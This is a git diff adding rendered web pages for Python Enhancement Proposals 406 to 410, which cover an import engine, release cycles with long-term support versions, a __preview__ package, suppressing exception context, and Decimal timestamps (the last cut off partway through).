Instance-specific versions of their process global sys equivalents
+
+

importlib.engine.GlobalImportEngine(ImportEngine)

+
+
Convenience class to provide engine-like access to the global state. +Provides __import__(), import_module() and from_engine() +methods like ImportEngine but writes through to the global state +in sys.
+

To support various namespace package mechanisms, when sys.path is altered, +tools like pkgutil.extend_path should be used to also modify other parts +of the import state (in this case, package __path__ attributes). The path +importer cache should also be invalidated when a variety of changes are made.

+

The ImportEngine API will provide convenience methods that automatically +make related import state updates as part of a single operation.

+
+
+

Global variables

+

importlib.engine.sysengine

+
+
A precreated instance of GlobalImportEngine. Intended for use by +importers and loaders that have been updated to accept optional engine +parameters and with ImportEngine.from_engine(sysengine) to start with +a copy of the process global import state.
+
+
+

No changes to finder/loader interfaces

+

Rather than attempting to update the PEP 302 APIs to accept additional state, this PEP proposes that ImportEngine support the context management protocol (similar to the context substitution mechanisms in the decimal module).

+

The context management mechanism for ImportEngine would:

+
    +
  • On entry:
    • Acquire the import lock
    • Substitute the global import state with the import engine’s own state
  • +
  • On exit:
    • Restore the previous global import state
    • Release the import lock
  • +
+

The precise API for this is TBD (but will probably use a distinct context +management object, along the lines of that created by +decimal.localcontext).
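
As a purely hypothetical illustration (the exact API is, as noted above, still TBD, and importlib.engine does not exist in any released Python):

+
# Hypothetical usage of the proposed API.
+from importlib.engine import ImportEngine, sysengine
+
+engine = ImportEngine.from_engine(sysengine)   # copy the global state
+engine.path.insert(0, '/path/to/plugins')      # engine-local sys.path
+
+with engine:                  # substitute global state, hold import lock
+    import plugin_module      # resolved using the engine's state
+# previous global import state restored on exit
+
+mod = engine.import_module('plugin_module')    # engine-local import
+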

+
+
+
+

Open Issues

+
+

API design for falling back to global import state

+

The current proposal relies on the from_engine() API to fall back to the +global import state. It may be desirable to offer a variant that instead falls +back to the global import state dynamically.

+

However, one big advantage of starting with an “as isolated as possible” +design is that it becomes possible to experiment with subclasses that blur +the boundaries between the engine instance state and the process global state +in various ways.

+
+
+

Builtin and extension modules must be process global

+

Due to platform limitations, only one copy of each builtin and extension +module can readily exist in each process. Accordingly, it is impossible for +each ImportEngine instance to load such modules independently.

+

The simplest solution is for ImportEngine to refuse to load such modules, +raising ImportError. GlobalImportEngine would be able to load them +normally.

+

ImportEngine will still return such modules from a prepopulated module +cache - it’s only loading them directly which causes problems.

+
+
+

Scope of substitution

+

Related to the previous open issue is the question of what state to substitute +when using the context management API. It is currently the case that replacing +sys.modules can be unreliable due to cached references, and there’s the +underlying fact that having independent copies of some modules is simply +impossible due to platform limitations.

+

As part of this PEP, it will be necessary to document explicitly:

+
    +
  • Which parts of the global import state can be substituted (and declare code +which caches references to that state without dealing with the substitution +case buggy)
  • +
  • Which parts must be modified in-place (and hence are not substituted by the +ImportEngine context management API, or otherwise scoped to +ImportEngine instances)
  • +
+
+
+
+

Reference Implementation

+

A reference implementation [4] for an earlier draft of this PEP, based on +Brett Cannon’s importlib, has been developed by Greg Slodkowicz as part of the +2011 Google Summer of Code. Note that the current implementation avoids +modifying existing code, and hence duplicates a lot of things unnecessarily. +An actual implementation would just modify any such affected code in place.

+

That earlier draft of the PEP proposed changing the PEP 302 APIs to support passing +in an optional engine instance. This had the (serious) downside of not correctly +affecting further imports from the imported module, hence the change to the +context-management-based proposal for substituting the global state.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0406.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0407/index.html b/pep-0407/index.html new file mode 100644 index 00000000000..47132407f86 --- /dev/null +++ b/pep-0407/index.html @@ -0,0 +1,278 @@ PEP 407 – New release cycle and introducing long-term support versions | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 407 – New release cycle and introducing long-term support versions

+
+
Author:
+
Antoine Pitrou <solipsis at pitrou.net>, +Georg Brandl <georg at python.org>, +Barry Warsaw <barry at python.org>
+
Status:
+
Deferred
+
Type:
+
Process
+
Created:
+
12-Jan-2012
+
Post-History:
+
17-Jan-2012
+
+
+
+
Table of Contents +
+
+

Abstract

+

Finding a release cycle for an open-source project is a delicate +exercise in managing mutually contradicting constraints: developer +manpower, availability of release management volunteers, ease of +maintenance for users and third-party packagers, quick availability of +new features (and behavioural changes), availability of bug fixes +without pulling in new features or behavioural changes.

+

The current release cycle errs on the conservative side. It is +adequate for people who value stability over reactivity. This PEP is +an attempt to keep the stability that has become a Python trademark, +while offering a more fluid release of features, by introducing the +notion of long-term support versions.

+
+
+

Scope

+

This PEP doesn’t try to change the maintenance period or release +scheme for the 2.7 branch. Only 3.x versions are considered.

+
+
+

Proposal

+

Under the proposed scheme, there would be two kinds of feature +versions (sometimes dubbed “minor versions”, for example 3.2 or 3.3): +normal feature versions and long-term support (LTS) versions.

+

Normal feature versions would get either zero or at most one bugfix +release; the latter only if needed to fix critical issues. Security +fix handling for these branches needs to be decided.

+

LTS versions would get regular bugfix releases until the next LTS +version is out. They then would go into security fixes mode, up to a +termination date at the release manager’s discretion.

+
+

Periodicity

+

A new feature version would be released every X months. We +tentatively propose X = 6 months.

+

LTS versions would be one out of N feature versions. We tentatively +propose N = 4.

+

With these figures, a new LTS version would be out every 24 months, +and remain supported until the next LTS version 24 months later. This +is mildly similar to today’s 18-month bugfix cycle for every feature +version.

+
+
+

Pre-release versions

+

More frequent feature releases imply a smaller number of disruptive +changes per release. Therefore, the number of pre-release builds +(alphas and betas) can be brought down considerably. Two alpha builds +and a single beta build would probably be enough in the regular case. +The number of release candidates depends, as usual, on the number of +last-minute fixes before final release.

+
+
+
+

Effects

+
+

Effect on development cycle

+

More feature releases might mean more stress on the development and +release management teams. This is quantitatively alleviated by the +smaller number of pre-release versions; and qualitatively by the +lesser amount of disruptive changes (meaning less potential for +breakage). The shorter feature freeze period (after the first beta +build until the final release) is easier to accept. The rush for +adding features just before feature freeze should also be much +smaller.

+
+
+

Effect on bugfix cycle

+

The effect on fixing bugs should be minimal with the proposed figures. +The same number of branches would be simultaneously open for bugfix +maintenance (two until 2.x is terminated, then one).

+
+
+

Effect on workflow

+

The workflow for new features would be the same: developers would only +commit them on the default branch.

+

The workflow for bug fixes would be slightly updated: developers would +commit bug fixes to the current LTS branch (for example 3.3) and +then merge them into default.

+

If some critical fixes are needed to a non-LTS version, they can be +grafted from the current LTS branch to the non-LTS branch, just like +fixes are ported from 3.x to 2.7 today.

+
+
+

Effect on the community

+

People who value stability can just synchronize on the LTS releases +which, with the proposed figures, would give a similar support cycle +(both in duration and in stability).

+

People who value reactivity and access to new features (without taking +the risk to install alpha versions or Mercurial snapshots) would get +much more value from the new release cycle than currently.

+

People who want to contribute new features or improvements would be +more motivated to do so, knowing that their contributions will be more +quickly available to normal users. Also, a smaller feature freeze +period makes it less cumbersome to interact with contributors of +features.

+
+
+
+

Discussion

+

These are open issues that should be worked out during discussion:

+
    +
  • Decide on X (months between feature releases) and N (feature releases +per LTS release) as defined above.
  • +
  • For given values of X and N, is the no-bugfix-releases policy for +non-LTS versions feasible?
  • +
  • What is the policy for security fixes?
  • +
  • Restrict new syntax and similar changes (i.e. everything that was +prohibited by PEP 3003) to LTS versions?
  • +
  • What is the effect on packagers such as Linux distributions?
  • +
  • How will release version numbers or other identifying and marketing +material make it clear to users which versions are normal feature +releases and which are LTS releases? How do we manage user +expectations?
  • +
  • Does the faster release cycle mean we could some day reach 3.10 and +above? Some people expressed a tacit expectation that version numbers +always fit in one decimal digit.
  • +
+

A community poll or survey to collect opinions from the greater Python +community would be valuable before making a final decision.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0407.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0408/index.html b/pep-0408/index.html new file mode 100644 index 00000000000..87d851be2a9 --- /dev/null +++ b/pep-0408/index.html @@ -0,0 +1,432 @@ PEP 408 – Standard library __preview__ package | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 408 – Standard library __preview__ package

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, +Eli Bendersky <eliben at gmail.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
07-Jan-2012
+
Python-Version:
+
3.3
+
Post-History:
+
27-Jan-2012
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

The process of including a new module into the Python standard library is +hindered by the API lock-in and promise of backward compatibility implied by +a module being formally part of Python. This PEP proposes a transitional +state for modules - inclusion in a special __preview__ package for the +duration of a minor release (roughly 18 months) prior to full acceptance into +the standard library. On one hand, this state provides the module with the +benefits of being formally part of the Python distribution. On the other hand, +the core development team explicitly states that no promises are made with +regards to the module’s eventual full inclusion into the standard library, +or to the stability of its API, which may change for the next release.

+
+
+

PEP Rejection

+

Based on his experience with a similar “labs” namespace in Google App Engine, +Guido has rejected this PEP [3] in favour of the simpler alternative of +explicitly marking provisional modules as such in their documentation.

+

If a module is otherwise considered suitable for standard library inclusion, +but some concerns remain regarding maintainability or certain API details, +then the module can be accepted on a provisional basis. While it is considered +an unlikely outcome, such modules may be removed from the standard library +without a deprecation period if the lingering concerns prove well-founded.

+

As part of the same announcement, Guido explicitly accepted Matthew +Barnett’s ‘regex’ module [4] as a provisional addition to the standard +library for Python 3.3 (using the ‘regex’ name, rather than as a drop-in +replacement for the existing ‘re’ module).

+
+
+

Proposal - the __preview__ package

+

Whenever the Python core development team decides that a new module should be +included into the standard library, but isn’t entirely sure about whether the +module’s API is optimal, the module can be placed in a special package named +__preview__ for a single minor release.

+

In the next minor release, the module may either be “graduated” into the +standard library (and occupy its natural place within its namespace, leaving the +__preview__ package), or be rejected and removed entirely from the Python +source tree. If the module ends up graduating into the standard library after +spending a minor release in __preview__, its API may be changed according +to accumulated feedback. The core development team explicitly makes no +guarantees about API stability and backward compatibility of modules in +__preview__.

+

Entry into the __preview__ package marks the start of a transition of the +module into the standard library. It means that the core development team +assumes responsibility of the module, similarly to any other module in the +standard library.

+
+

Which modules should go through __preview__

+

We expect most modules proposed for addition into the Python standard library +to go through a minor release in __preview__. There may, however, be some +exceptions, such as modules that use a pre-defined API (for example lzma, +which generally follows the API of the existing bz2 module), or modules +with an API that has wide acceptance in the Python development community.

+

In any case, modules that are proposed to be added to the standard library, +whether via __preview__ or directly, must fulfill the acceptance conditions +set by PEP 2.

+

It is important to stress that the aim of this proposal is not to make the +process of adding new modules to the standard library more difficult. On the +contrary, it tries to provide a means to add more useful libraries. Modules +which are obvious candidates for entry can be added as before. Modules which +due to uncertainties about the API could be stalled for a long time now have +a means to still be distributed with Python, via an incubation period in the +__preview__ package.

+
+
+

Criteria for “graduation”

+

In principle, most modules in the __preview__ package should eventually +graduate to the stable standard library. Some reasons for not graduating are:

+
    +
  • The module may prove to be unstable or fragile, without sufficient developer +support to maintain it.
  • +
  • A much better alternative module may be found during the preview release
  • +
+

Essentially, the decision will be made by the core developers on a per-case +basis. The point to emphasize here is that a module’s appearance in the +__preview__ package in some release does not guarantee it will continue +being part of Python in the next release.

+
+
+

Example

+

Suppose the example module is a candidate for inclusion in the standard +library, but some Python developers aren’t convinced that it presents the best +API for the problem it intends to solve. The module can then be added to the +__preview__ package in release 3.X, importable via:

+
from __preview__ import example
+
+
+

Assuming the module is then promoted to the standard library proper in +release 3.X+1, it will be moved to a permanent location in the library:

+
import example
+
+
+

And importing it from __preview__ will no longer work.

+
+
+
+

Rationale

+
+

Benefits for the core development team

+

Currently, the core developers are really reluctant to add new interfaces to +the standard library. This is because as soon as they’re published in a +release, API design mistakes get locked in due to backward compatibility +concerns.

+

By gating all major API additions through some kind of a preview mechanism +for a full release, we get one full release cycle of community feedback +before we lock in the APIs with our standard backward compatibility guarantee.

+

We can also start integrating preview modules with the rest of the standard +library early, so long as we make it clear to packagers that the preview +modules should not be considered optional. The only difference between preview +APIs and the rest of the standard library is that preview APIs are explicitly +exempted from the usual backward compatibility guarantees.

+

Essentially, the __preview__ package is intended to lower the risk of +locking in minor API design mistakes for extended periods of time. Currently, +this concern can block new additions, even when the core development team +consensus is that a particular addition is a good idea in principle.

+
+
+

Benefits for end users

+

For future end users, the broadest benefit lies in a better “out-of-the-box” +experience - rather than being told “oh, the standard library tools for task X +are horrible, download this 3rd party library instead”, those superior tools +are more likely to be just an import away.

+

For environments where developers are required to conduct due diligence on +their upstream dependencies (severely harming the cost-effectiveness of, or +even ruling out entirely, much of the material on PyPI), the key benefit lies +in ensuring that anything in the __preview__ package is clearly under +python-dev’s aegis from at least the following perspectives:

+
    +
  • Licensing: Redistributed by the PSF under a Contributor Licensing Agreement.
  • +
  • Documentation: The documentation of the module is published and organized via +the standard Python documentation tools (i.e. ReST source, output generated +with Sphinx and published on http://docs.python.org).
  • +
  • Testing: The module test suites are run on the python.org buildbot fleet +and results published via http://www.python.org/dev/buildbot.
  • +
  • Issue management: Bugs and feature requests are handled on +http://bugs.python.org
  • +
  • Source control: The master repository for the software is published +on http://hg.python.org.
  • +
+
+
+
+

Candidates for inclusion into __preview__

+

For Python 3.3, there are a number of clear current candidates:

+ +

Other possible future use cases include:

+
    +
  • Improved HTTP modules (e.g. requests)
  • +
  • HTML 5 parsing support (e.g. html5lib)
  • +
  • Improved URL/URI/IRI parsing
  • +
  • A standard image API (PEP 368)
  • +
  • Encapsulation of the import state (PEP 368)
  • +
  • Standard event loop API (PEP 3153)
  • +
  • A binary version of WSGI for Python 3 (e.g. PEP 444)
  • +
  • Generic function support (e.g. simplegeneric)
  • +
+
+
+

Relationship with PEP 407

+

PEP 407 proposes a change to the core Python release cycle to permit interim +releases every 6 months (perhaps limited to standard library updates). If +such a change to the release cycle is made, the following policy for the +__preview__ namespace is suggested:

+
    +
  • For long-term support releases, the __preview__ namespace would always +be empty.
  • +
  • New modules would be accepted into the __preview__ namespace only in +interim releases that immediately follow a long-term support release.
  • +
  • All modules added will either be migrated to their final location in the +standard library or dropped entirely prior to the next long-term support +release.
  • +
+
+
+

Rejected alternatives and variations

+
+

Using __future__

+

Python already has a “forward-looking” namespace in the form of the +__future__ module, so it’s reasonable to ask why that can’t be re-used for +this new purpose.

+

There are two reasons why doing so is not appropriate:

+

1. The __future__ module is actually linked to a separate compiler +directives feature that can change the way the Python interpreter +compiles a module. We don’t want that for the preview package - we just want +an ordinary Python package.

+

2. The __future__ module comes with an express promise that names will be +maintained in perpetuity, long after the associated features have become the +compiler’s default behaviour. Again, this is precisely the opposite of what is +intended for the preview package - it is almost certain that all names added to +the preview will be removed at some point, most likely due to their being moved +to a permanent home in the standard library, but also potentially due to their +being reverted to third party package status (if community feedback suggests the +proposed addition is irredeemably broken).

+
+
+

Versioning the package

+

One proposed alternative [1] was to add explicit versioning to the +__preview__ package, i.e. __preview34__. We think that it’s better to +simply define that a module being in __preview__ in Python 3.X will either +graduate to the normal standard library namespace in Python 3.X+1 or will +disappear from the Python source tree altogether. Versioning the __preview__ +package complicates the process and does not align well with the main intent of +this proposal.

+
+
+

Using a package name without leading and trailing underscores

+

It was proposed [1] to use a package name like preview or exp, instead +of __preview__. This was rejected in the discussion due to the special +meaning a “dunder” package name (that is, a name with leading and +trailing double-underscores) conveys in Python. Besides, a non-dunder name +would suggest normal standard library API stability guarantees, which is not +the intention of the __preview__ package.

+
+
+

Preserving pickle compatibility

+

A pickled class instance based on a module in __preview__ in release 3.X +won’t be unpickle-able in release 3.X+1, where the module won’t be in +__preview__. Special code may be added to make this work, but this goes +against the intent of this proposal, since it implies backward compatibility. +Therefore, this PEP does not propose to preserve pickle compatibility.
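A hypothetical sketch of the failure mode (neither the __preview__ package nor the Widget class ever existed):

import pickle

# Release 3.X: the pickle records the qualified name '__preview__.example.Widget'.
from __preview__ import example
data = pickle.dumps(example.Widget())

# Release 3.X+1: the module graduated to plain 'example', so the name
# recorded in the old pickle no longer resolves and loading fails.
obj = pickle.loads(data)  # raises ImportError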

+
+
+
+

Credits

+

Dj Gilcrease initially proposed the idea of having a __preview__ package +in Python [2]. Although his original proposal uses the name +__experimental__, we feel that __preview__ conveys the meaning of this +package in a better way.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0408.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0409/index.html b/pep-0409/index.html new file mode 100644 index 00000000000..795bfb78668 --- /dev/null +++ b/pep-0409/index.html @@ -0,0 +1,296 @@ PEP 409 – Suppressing exception context | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 409 – Suppressing exception context

+
+
Author:
+
Ethan Furman <ethan at stoneleaf.us>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
26-Jan-2012
+
Python-Version:
+
3.3
+
Post-History:
+
30-Aug-2002, 01-Feb-2012, 03-Feb-2012
+
Superseded-By:
+
415
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

One of the open issues from PEP 3134 is suppressing context: currently +there is no way to do it. This PEP proposes one.

+
+
+

Rationale

+

There are two basic ways to generate exceptions:

+
    +
  1. Python does it (buggy code, missing resources, ending loops, etc.)
  2. +
  3. manually (with a raise statement)
  4. +
+

When writing libraries, or even just custom classes, it can become +necessary to raise exceptions; moreover it can be useful, even +necessary, to change from one exception to another. To take an example +from my dbf module:

+
try:
+    value = int(value)
+except Exception:
+    raise DbfError(...)
+
+
+

Whatever the original exception was (ValueError, TypeError, or +something else) is irrelevant. The exception from this point on is a +DbfError, and the original exception is of no value. However, if +this exception is printed, we would currently see both.

+
+
+

Alternatives

+

Several possibilities have been put forth:

+
    +
  • raise as NewException()

    Reuses the as keyword; can be confusing since we are not really +reraising the originating exception

    +
  • +
  • raise NewException() from None

    Follows existing syntax of explicitly declaring the originating +exception

    +
  • +
  • exc = NewException(); exc.__context__ = None; raise exc

    Very verbose way of the previous method

    +
  • +
  • raise NewException.no_context(...)

    Make context suppression a class method.

    +
  • +
+

All of the above options will require changes to the core.

+
+
+

Proposal

+

I propose going with the second option:

+
raise NewException from None
+
+
+

It has the advantage of using the existing pattern of explicitly setting +the cause:

+
raise KeyError() from NameError()
+
+
+

but because the cause is None the previous context is not displayed +by the default exception printing routines.
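For instance, reusing the DbfError example from the Rationale above, the accepted form works like this on Python 3.3 and later:

class DbfError(Exception):
    pass

try:
    value = int("not a number")
except ValueError:
    # Only the DbfError traceback is displayed; the ValueError
    # context is suppressed by "from None".
    raise DbfError("unable to convert value") from None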

+
+
+

Implementation Discussion

+

Note: after acceptance of this PEP, a cleaner implementation mechanism +was proposed and accepted in PEP 415. Refer to that PEP for more +details on the implementation actually used in Python 3.3.

+

Currently, None is the default for both __context__ and __cause__. +In order to support raise ... from None (which would set __cause__ to +None) we need a different default value for __cause__. Several ideas +were put forth on how to implement this at the language level:

+
    +
  • Overwrite the previous exception information (side-stepping the issue and +leaving __cause__ at None).

    Rejected as this can seriously hinder debugging due to +poor error messages.

    +
  • +
  • Use one of the boolean values in __cause__: False would be the +default value, and would be replaced when from ... was used with the +explicitly chained exception or None.

    Rejected as this encourages the use of two different objects types for +__cause__ with one of them (boolean) not allowed to have the full range +of possible values (True would never be used).

    +
  • +
  • Create a special exception class, __NoException__.

    Rejected as possibly confusing, possibly being mistakenly raised by users, +and not being a truly unique value as None, True, and False are.

    +
  • +
  • Use Ellipsis as the default value (the ... singleton).

    Accepted.

    +

Ellipses are commonly used in English as placeholders when words are +omitted. This works in our favor here as a signal that __cause__ is +omitted, so look in __context__ for more details.

    +

    Ellipsis is not an exception, so cannot be raised.

    +

    There is only one Ellipsis, so no unused values.

    +

    Error information is not thrown away, so custom code can trace the entire +exception chain even if the default code does not.

    +
  • +
+
+
+

Language Details

+

To support raise Exception from None, __context__ will stay as it is, +but __cause__ will start out as Ellipsis and will change to None +when the raise Exception from None syntax is used.

+ + + + + + + + + + + + + + + + + + + + + +
form                                    __context__         __cause__
raise                                   None                Ellipsis
reraise                                 previous exception  Ellipsis
reraise from None | ChainedException    previous exception  None | explicitly chained exception
+

The default exception printing routine will then:

+
    +
  • If __cause__ is Ellipsis the __context__ (if any) will be +printed.
  • +
  • If __cause__ is None the __context__ will not be printed.
  • +
  • if __cause__ is anything else, __cause__ will be printed.
  • +
+

In both of the latter cases the exception chain will stop being followed.
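The rule amounts to a three-way branch; here is a sketch as a hypothetical helper (PEP 415 later changed the actual mechanism):

def link_to_display(exc):
    if exc.__cause__ is Ellipsis:   # no explicit "from": follow the
        return exc.__context__      # implicit context, if any
    if exc.__cause__ is None:       # "raise ... from None": suppress
        return None
    return exc.__cause__            # explicit cause: print it, then stop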

+

Because the default value for __cause__ is now Ellipsis and raise +Exception from Cause is simply syntactic sugar for:

+
_exc = NewException()
+_exc.__cause__ = Cause()
+raise _exc
+
+
+

Ellipsis, as well as None, is now allowed as a cause:

+
raise Exception from Ellipsis
+
+
+
+
+

Patches

+

There is a patch for CPython implementing this attached to Issue 6210.

+
+
+

References

+

Discussion and refinements in this thread on python-dev.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0409.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0410/index.html b/pep-0410/index.html new file mode 100644 index 00000000000..ef60c2a77a5 --- /dev/null +++ b/pep-0410/index.html @@ -0,0 +1,641 @@ PEP 410 – Use decimal.Decimal type for timestamps | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 410 – Use decimal.Decimal type for timestamps

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
01-Feb-2012
+
Python-Version:
+
3.3
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP is rejected. +See https://mail.python.org/pipermail/python-dev/2012-February/116837.html.

+
+
+

Abstract

+

Decimal becomes the official type for high-resolution timestamps to make Python +support new functions using a nanosecond resolution without loss of precision.

+
+
+

Rationale

+

Python 2.3 introduced float timestamps to support sub-second resolutions. +os.stat() has used float timestamps by default since Python 2.5. Python 3.3 +introduced functions supporting nanosecond resolutions:

+
    +
  • os module: futimens(), utimensat()
  • +
  • time module: clock_gettime(), clock_getres(), monotonic(), wallclock()
  • +
+

os.stat() reads nanosecond timestamps but returns timestamps as float.

+

The Python float type uses binary64 format of the IEEE 754 standard. With a +resolution of one nanosecond (10^-9), float timestamps lose precision +for values bigger than 2^24 seconds (194 days: 1970-07-14 for an Epoch +timestamp).
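This threshold is easy to check interactively: binary64 has a 52-bit mantissa, so near 2^24 the spacing between adjacent floats is roughly 3.7 × 10^-9 and an added nanosecond rounds away:

print(2.0**24 + 1e-9 == 2.0**24)  # True: the nanosecond is lost
print(2.0**23 + 1e-9 == 2.0**23)  # False: below the threshold it survives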

+

Nanosecond resolution is required to set the exact modification time on +filesystems supporting nanosecond timestamps (e.g. ext4, btrfs, NTFS, …). It +also helps to compare modification times to check if a file is newer than +another file. Use cases: copy the modification time of a file using +shutil.copystat(), create a TAR archive with the tarfile module, manage a +mailbox with the mailbox module, etc.

+

An arbitrary resolution is preferred over a fixed resolution (like nanosecond) +to not have to change the API when a better resolution is required. For +example, the NTP protocol uses fractions of 2^32 seconds +(approximately 2.3 × 10^-10 second), whereas the NTP protocol version +4 uses fractions of 2^64 seconds (5.4 × 10^-20 second).

+
+

Note

+

With a resolution of 1 microsecond (10^-6), float timestamps lose +precision for values bigger than 2^33 seconds (272 years: 2242-03-16 +for an Epoch timestamp). With a resolution of 100 nanoseconds +(10^-7, resolution used on Windows), float timestamps lose precision +for values bigger than 2^29 seconds (17 years: 1987-01-05 for an +Epoch timestamp).

+
+
+
+

Specification

+

Add decimal.Decimal as a new type for timestamps. Decimal supports any +timestamp resolution, supports arithmetic operations and is comparable. It is +possible to coerce a Decimal to float, even if the conversion may lose +precision. The clock resolution can also be stored in a Decimal object.
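A short runnable demonstration of the precision argument (the sample value is an arbitrary nanosecond-resolution Epoch timestamp):

from decimal import Decimal

ns = 1328915175723697595     # timestamp in integer nanoseconds
print(ns / 10**9)            # float: the final digits are rounded away
print(Decimal(ns) / 10**9)   # Decimal: 1328915175.723697595, exact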

+

Add an optional timestamp argument to:

+
    +
  • os module: fstat(), fstatat(), lstat(), stat() (st_atime, +st_ctime and st_mtime fields of the stat structure), +sched_rr_get_interval(), times(), wait3() and wait4()
  • +
  • resource module: ru_utime and ru_stime fields of getrusage()
  • +
  • signal module: getitimer(), setitimer()
  • +
  • time module: clock(), clock_gettime(), clock_getres(), +monotonic(), time() and wallclock()
  • +
+

The timestamp argument value can be float or Decimal; float is still the +default for backward compatibility. The following functions support Decimal as +input:

+
    +
  • datetime module: date.fromtimestamp(), datetime.fromtimestamp() and +datetime.utcfromtimestamp()
  • +
  • os module: futimes(), futimesat(), lutimes(), utime()
  • +
  • select module: epoll.poll(), kqueue.control(), select()
  • +
  • signal module: setitimer(), sigtimedwait()
  • +
  • time module: ctime(), gmtime(), localtime(), sleep()
  • +
+

The os.stat_float_times() function is deprecated: use an explicit cast using +int() instead.

+
+

Note

+

The decimal module is implemented in Python and is slower than float, but +there is a new C implementation which is almost ready for inclusion in +CPython.

+
+
+
+

Backwards Compatibility

+

The default timestamp type (float) is unchanged, so there is no impact on +backward compatibility or on performance. The new timestamp type, +decimal.Decimal, is only returned when requested explicitly.

+
+
+

Objection: clocks accuracy

+

Computer clocks and operating systems are inaccurate and fail to provide +nanosecond accuracy in practice. A nanosecond is what it takes to execute a +couple of CPU instructions. Even on a real-time operating system, a +nanosecond-precise measurement is already obsolete when it starts being +processed by the higher-level application. A single cache miss in the CPU will +make the precision worthless.

+
+

Note

+

Linux actually is able to measure time in nanosecond precision, even +though it is not able to keep its clock synchronized to UTC with a +nanosecond accuracy.

+
+
+
+

Alternatives: Timestamp types

+

To support timestamps with an arbitrary or nanosecond resolution, the following +types have been considered:

+
    +
  • decimal.Decimal
  • +
  • number of nanoseconds
  • +
  • 128-bits float
  • +
  • datetime.datetime
  • +
  • datetime.timedelta
  • +
  • tuple of integers
  • +
  • timespec structure
  • +
+

Criteria:

+
    +
  • Doing arithmetic on timestamps must be possible
  • +
  • Timestamps must be comparable
  • +
  • An arbitrary resolution, or at least a resolution of one nanosecond without +losing precision
  • +
  • It should be possible to coerce the new timestamp to float for backward +compatibility
  • +
+

A resolution of one nanosecond is enough to support all current C functions.

+

The best resolution used by operating systems is one nanosecond. In practice, +most clock accuracy is closer to microseconds than nanoseconds. So it sounds +reasonable to use a fixed resolution of one nanosecond.

+
+

Number of nanoseconds (int)

+

A nanosecond resolution is enough for all current C functions and so a +timestamp can simply be a number of nanoseconds, an integer, not a float.

+

The number of nanoseconds format has been rejected because it would require +adding new specialized functions for this format: it is not possible to +differentiate a number of nanoseconds from a number of seconds just by checking +the object type.

+
+
+

128-bits float

+

Add a new IEEE 754-2008 quad-precision binary float type. The IEEE 754-2008 +quad precision float has 1 sign bit, 15 bits of exponent and 112 bits of +mantissa. 128-bits float is supported by GCC (4.3), Clang and ICC compilers.

+

Python must be portable and so cannot rely on a type only available on some +platforms. For example, Visual C++ 2008 doesn’t support 128-bits float, whereas +it is used to build the official Windows executables. Another example: GCC 4.3 +does not support __float128 in 32-bit mode on x86 (but GCC 4.4 does).

+

There is also a license issue: GCC uses the MPFR library for 128-bits float, +a library distributed under the GNU LGPL license. This license is not compatible +with the Python license.

+
+

Note

+

The x87 floating point unit of Intel CPUs supports 80-bit floats. This format +is not supported by the SSE instruction set, which is now preferred for float +operations, especially on x86_64. Other CPU vendors don’t support 80-bit float.

+
+
+
+

datetime.datetime

+

The datetime.datetime type is the natural choice for a timestamp because it is +clear that this type contains a timestamp, whereas int, float and Decimal are +raw numbers. It is an absolute timestamp and so is well defined. It gives +direct access to the year, month, day, hours, minutes and seconds. It has +methods related to time like methods to format the timestamp as string (e.g. +datetime.datetime.strftime).

+

The major issue is that except os.stat(), time.time() and +time.clock_gettime(time.CLOCK_REALTIME), all time functions have an unspecified +starting point and no timezone information, and so cannot be converted to +datetime.datetime.

+

datetime.datetime also has issues with timezones. For example, a datetime object +without timezone (unaware) and a datetime with a timezone (aware) cannot be +compared. There is also an ordering issue with daylight saving time (DST) in +the duplicated hour when switching from DST back to normal time.

+

datetime.datetime has been rejected because it cannot be used for functions +using an unspecified starting point like os.times() or time.clock().

+

For time.time() and time.clock_gettime(time.CLOCK_REALTIME): it is already +possible to get the current time as a datetime.datetime object using:

+
datetime.datetime.now(datetime.timezone.utc)
+
+
+

For os.stat(), it is simple to create a datetime.datetime object from a +decimal.Decimal timestamp in the UTC timezone:

+
datetime.datetime.fromtimestamp(value, datetime.timezone.utc)
+
+
+
+

Note

+

datetime.datetime only supports microsecond resolution, but can be enhanced +to support nanosecond.

+
+
+
+

datetime.timedelta

+

datetime.timedelta is the natural choice for a relative timestamp because it is +clear that this type contains a timestamp, whereas int, float and Decimal are +raw numbers. It can be used with datetime.datetime to get an absolute timestamp +when the starting point is known.

+

datetime.timedelta has been rejected because it cannot be coerced to float and +has a fixed resolution. One new standard timestamp type is enough; Decimal is +preferred over datetime.timedelta. Converting a datetime.timedelta to float +requires an explicit call to the datetime.timedelta.total_seconds() method.

+
+

Note

+

datetime.timedelta only supports microsecond resolution, but can be enhanced +to support nanosecond.

+
+
+
+

Tuple of integers

+

To expose C functions in Python, a tuple of integers is the natural choice to +store a timestamp because the C language uses structures with integer fields +(e.g. timeval and timespec structures). Using only integers avoids the loss of +precision (Python supports integers of arbitrary length). Creating and parsing +a tuple of integers is simple and fast.

+

Depending on the exact format of the tuple, the precision can be arbitrary or +fixed. The precision can be chosen so that the loss of precision is smaller than +an arbitrary limit, such as one nanosecond.

+

Different formats have been proposed:

+
    +
